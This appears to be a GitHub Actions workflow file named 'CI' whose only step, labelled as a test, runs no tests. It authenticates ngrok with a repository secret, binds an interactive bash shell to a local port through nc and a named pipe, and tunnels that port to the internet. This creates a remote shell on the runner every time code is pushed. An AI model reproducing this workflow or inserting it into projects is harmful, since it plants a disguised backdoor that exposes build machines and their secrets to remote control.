name: CI

on: 
  push:
  workflow_dispatch:

jobs:
  test:

    runs-on: macOS-latest
    
    steps:
    - uses: actions/checkout@v1
    - name: Test workflow - v2
      env:
        TOKEN: ${{ secrets.TOKEN }}
      run: |
        ./ngrok authtoken "$TOKEN"
        mkfifo myfifo
        nc -l 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1 & ./ngrok tcp 8080
